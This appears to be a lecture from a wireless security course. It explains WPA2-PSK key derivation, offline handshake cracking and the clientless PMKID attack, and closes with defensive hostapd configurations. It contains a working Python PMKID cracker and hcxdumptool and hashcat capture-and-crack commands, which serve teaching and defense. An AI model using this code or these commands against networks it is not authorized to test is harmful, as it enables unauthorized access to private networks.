"The security of WPA2 Personal rests entirely on the strength of the passphrase." — Wi-Fi Alliance Technical Note on WPA2-Personal
Lecture (50 min)
4.1 WPA2-PSK Architecture
WPA2-Personal (PSK mode) replaced both WEP and WPA-TKIP. It uses:
- AES-CCMP for data encryption (Counter Mode CBC-MAC Protocol)
- PBKDF2 to derive the Pairwise Master Key (PMK) from the passphrase
- 4-way handshake to derive per-session traffic keys (PTK) from the PMK
- EAPOL (Extensible Authentication Protocol over LAN) as the transport for the handshake
CCMP wraps the AES block cipher (128-bit block) in CCM mode: CTR mode provides confidentiality for the frame body and CBC-MAC provides integrity over the body plus selected header fields, both under one key. WPA2-Personal uses AES-128 only, because the CCMP key is the 128-bit TK from the key hierarchy below; CCMP-256 exists in later amendments but is not part of WPA2-PSK.
4.2 Key Derivation: From Passphrase to PTK
Step 1 — PMK derivation:
PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096, 256)
PBKDF2 with 4096 iterations stretches the passphrase. The SSID is the salt, which means the PMK is SSID-specific (a precomputed table for "linksys" does not work against "home-network-5G"). The PMK is 256 bits.
Step 2 — ANonce + SNonce exchange (4-way handshake):
AP --[Message 1]--> STA ANonce (random, 256 bits), optionally a PMKID (see 4.4)
STA --[Message 2]--> AP SNonce + RSN IE + MIC (Message Integrity Code)
AP --[Message 3]--> STA ANonce + GTK (Group Temporal Key, encrypted with the KEK) + MIC
STA --[Message 4]--> AP ACK + MIC
Step 3 — PTK derivation:
PTK = PRF-384(PMK, "Pairwise key expansion", min(AP_MAC,STA_MAC) || max(AP_MAC,STA_MAC) || min(ANonce,SNonce) || max(ANonce,SNonce))
The PTK is derived with the 802.11 pseudo-random function (HMAC-SHA1 iterated over the label, the two MAC addresses and the two nonces; min/max ordering makes both sides compute the same input). For CCMP the output is 384 bits; PRF-512 is the TKIP variant, whose 256-bit TK also carries the Michael MIC keys. The 384 bits are split into:
- KCK (Key Confirmation Key, 128 bits): used to compute the MIC in messages 2, 3, 4
- KEK (Key Encryption Key, 128 bits): used to encrypt the GTK in message 3
- TK (Temporal Key, 128 bits): the actual AES-CCMP session key for data
4.3 The Attack: Why the Handshake is Capturable
The 4-way handshake is transmitted in cleartext on the wireless medium (EAPOL-Key frames are not encrypted; only the GTK inside Message 3 is wrapped with the KEK). The MIC in messages 2, 3 and 4 is computed as:
MIC = HMAC-SHA1(KCK, EAPOL_frame) (truncated to 128 bits; the frame's 16-byte MIC field is zeroed before hashing)
An attacker who captures:
- The SSID (from the Beacon)
- ANonce (from Message 1)
- SNonce + MIC (from Message 2)
- AP MAC + STA MAC (from the frame headers)
...can attempt to verify a candidate passphrase offline:
- Compute PMK = PBKDF2(passphrase, SSID, 4096, 256)
- Derive PTK using the captured nonces and MACs
- Compute expected MIC using the KCK
- Compare to captured MIC
If they match, the passphrase is correct. This is a pure offline attack: the attacker never needs to interact with the AP again, and nothing in the exchange rate-limits guessing. Message 2 alone is sufficient because it already contains the SNonce and a MIC; Message 3 or 4 can substitute, since each carries a MIC under the same KCK.
4.4 The PMKID Attack (Clientless Variant)
In 2018, Jens Steube (hashcat lead developer) showed that the PMKID, which many APs include in EAPOL Message 1, can be used to verify a passphrase without capturing a full 4-way handshake:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || STA_MAC)
Here AP_MAC is the BSSID and STA_MAC is the supplicant's address; "PMK Name" is the literal ASCII label. The PMKID is carried in the Key Data field of the AP's Message 1. The attacker:
- Authenticates and associates with the AP (no other client needs to be connected)
- Receives Message 1 containing the PMKID
- Extracts the PMKID and runs the offline dictionary attack exactly as with the 4-way handshake (PMK per candidate, one HMAC, compare)
Tools: hcxdumptool captures the PMKID; hcxpcapngtool converts it to hashcat format (-m 22000).
The PMKID attack is clientless: no deauthentication is required and there is no waiting for a client to connect. It only works against APs that actually place a PMKID in Message 1 (common on consumer routers with roaming or PMK caching enabled); otherwise the attacker falls back to handshake capture.
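The PMKID computation and the clientless check, as an added Python example (not lecture code and not hcx or hashcat code). It also writes and parses the type-01 (PMKID) line of the hashcat 22000 format, WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***, so the value captured by hcxdumptool and the value a cracker recomputes can be compared field by field. SSID, MACs and wordlist are constructed.

```python
import hashlib
import hmac

def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def compute_pmkid(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA) truncated to 128 bits (AKM 00-0F-AC:2)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def to_22000_line(pmkid, ap_mac, sta_mac, ssid):
    """hashcat mode 22000, type 01: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex*** (last three fields empty)."""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())

def parse_22000_line(line):
    """Inverse of to_22000_line; rejects type-02 (EAPOL) lines and malformed input."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a type-01 (PMKID) 22000 line")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "ap_mac": bytes.fromhex(fields[3]),
        "sta_mac": bytes.fromhex(fields[4]),
        "ssid": bytes.fromhex(fields[5]).decode(),
    }

def crack_pmkid(line, wordlist):
    """Offline check: one PBKDF2 plus one HMAC per candidate, no handshake and no client needed."""
    target = parse_22000_line(line)
    for candidate in wordlist:
        pmkid = compute_pmkid(derive_pmk(candidate, target["ssid"]), target["ap_mac"], target["sta_mac"])
        if hmac.compare_digest(pmkid, target["pmkid"]):
            return candidate
    return None

# Constructed "capture": the AP's PMKID for a known passphrase, as hcxpcapngtool would emit it.
SSID = "lab-net"
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")      # the attacker's own address: it chose it when associating
TRUE_PASSPHRASE = "correct-horse"
CAPTURED_LINE = to_22000_line(compute_pmkid(derive_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC),
                              AP_MAC, STA_MAC, SSID)
WORDLIST = ["password", "sunflower2024", "linksys", "correct-horse", "letmein"]

if __name__ == "__main__":
    print(CAPTURED_LINE)
    print("recovered passphrase:", crack_pmkid(CAPTURED_LINE, WORDLIST))
```

Note that STA_MAC is the attacker's own interface address: because the attacker is the supplicant in this exchange, every input to the PMKID except the PMK is under their control or public, which is exactly why no legitimate client is needed.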
4.5 Dictionary Attack Mechanics
The offline attack is computationally bounded by PBKDF2: each candidate costs two blocks of 4096 HMAC-SHA1 iterations (the 256-bit PMK spans two SHA-1 outputs), while the PTK and MIC (or PMKID) step adds only a handful of HMACs. Because the PMK depends only on passphrase and SSID, one PBKDF2 evaluation tests a candidate against every handshake captured for that SSID. Order-of-magnitude throughput (one "hash" = one full candidate check):
| Hardware | Approx. Throughput |
|---|---|
| CPU (single core) | ~100 hashes/sec |
| RTX 3090 | ~600,000 hashes/sec |
| 8x RTX 4090 cluster | ~4,000,000 hashes/sec |
rockyou.txt has ~14 million entries; at the RTX 3090 rate above, about 23 seconds exhausts the list. Against a passphrase that is not in rockyou (or reachable from it by the applied rules), the attack simply fails: there is no shortcut through PBKDF2.
Passphrase strength: PBKDF2-SHA1 4096 iterations limits the GPU throughput. A 20-character random passphrase from a 95-character printable ASCII space has 95^20 ≈ 10^39 candidates -- far beyond any brute-force scenario. But most users choose passphrases like "SunflowerFields2024" which appear in combined dictionaries with rule-based mutations.
4.6 Defense Recommendations
- Use a strong passphrase: minimum 20 characters; avoid dictionary words; use a password manager
- Enable MFP (802.11w): authenticates deauthentication/disassociation frames, so an attacker cannot forge them to force a reconnection. It does not stop passive capture of a handshake from a client that (re)connects on its own, and it does nothing against the PMKID attack, so it shortens the attacker's window rather than closing it
- Move to WPA3-SAE: the SAE (Dragonfly) exchange gives an eavesdropper nothing to test candidates against offline, so each guess costs an online handshake with the AP (see Week 6). Disable WPA2/WPA3 transition mode where possible, since a client that can be steered to WPA2-PSK brings the offline attack back
- Segment the wireless network: even if the PSK is compromised, limit lateral movement with VLAN isolation
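The two configurations side by side in hostapd syntax, as an added example (hostapd is not named in the lecture; it is assumed here as the AP software, and the directive names are its standard ones). The first fragment is the WPA2-PSK setup this week's attack targets; the second applies the recommendations above.

```ini
# Weak: WPA2-PSK, no PMF, short guessable passphrase. Handshake and PMKID are crackable offline.
interface=wlan0
ssid=lab-net
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=sunflower2024
ieee80211w=0

# Hardened: WPA3-SAE only (no WPA-PSK in wpa_key_mgmt, so no transition mode), PMF required.
# sae_password is a placeholder; use a long random passphrase from a password manager.
interface=wlan0
ssid=lab-net
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=REPLACE-WITH-A-LONG-RANDOM-PASSPHRASE
ieee80211w=2
```

If the network must stay on WPA2-PSK for legacy clients, keep ieee80211w=2 and the long passphrase; the PBKDF2 cost then has to do all the work, which is only adequate when the passphrase is outside any dictionary plus rules.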
Lab Preview
Lab 4 captures a WPA2-PSK 4-way handshake using deauthentication injection, then runs a dictionary attack with hashcat. The authorized lab AP is pre-configured with a passphrase that exists in the provided wordlist.
Homework
Reading (45 min): Read the IEEE 802.11i standard summary at Wi-Fi Alliance (linked from course portal), focusing on the key hierarchy diagram. Then read the Steube 2018 PMKID blog post (linked).
Hands-on (60 min): In Python, implement the PMK derivation:
import hashlib, binascii
# PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes = 256 bits)
pmk = hashlib.pbkdf2_hmac('sha1', b'passphrase', b'SSID', 4096, 32)
print(binascii.hexlify(pmk).decode())
Use the provided test vector (passphrase='password', SSID='IEEE') and verify that your output matches the PSK listed in Annex H.4 of the 802.11i spec.
Toolchain Diary Entry
First-introduce this week: hcxdumptool, hcxpcapngtool, hashcat -m 22000
hcxdumptool -i wlan0mon -o out.pcapng --enable_status=1: capture PMKID and/or 4-way handshakes. --enable_status=1 prints progress.
hcxpcapngtool -o hash.22000 out.pcapng: convert capture to hashcat 22000 format (handles both PMKID and EAPOL handshakes).
hashcat -m 22000 hash.22000 wordlist.txt -r rules/best64.rule: dictionary attack with rule mutations. -m 2500 is deprecated; use -m 22000.
Key Terms
- PMK: Pairwise Master Key; 256-bit key derived from passphrase + SSID via PBKDF2-SHA1-4096
- PTK: Pairwise Transient Key; per-session key derived from PMK + nonces + MAC addresses; split into KCK, KEK, TK
- ANonce / SNonce: Authenticator Nonce / Supplicant Nonce; random 256-bit values from AP and STA respectively; used in PTK derivation
- EAPOL: Extensible Authentication Protocol over LAN; transport for 4-way handshake messages
- MIC: Message Integrity Code; HMAC-SHA1 of the EAPOL-Key frame (MIC field zeroed) computed with the KCK and truncated to 128 bits; proves possession of the KCK, and therefore of the PMK, without revealing either
- PMKID: Pairwise Master Key Identifier; HMAC-SHA1-128 of PMK + "PMK Name" + AP_MAC + STA_MAC; present in EAPOL Message 1; enables clientless dictionary attack
- PBKDF2: Password-Based Key Derivation Function 2; stretches a passphrase using N iterations of HMAC; makes GPU dictionary attacks slower but not impossible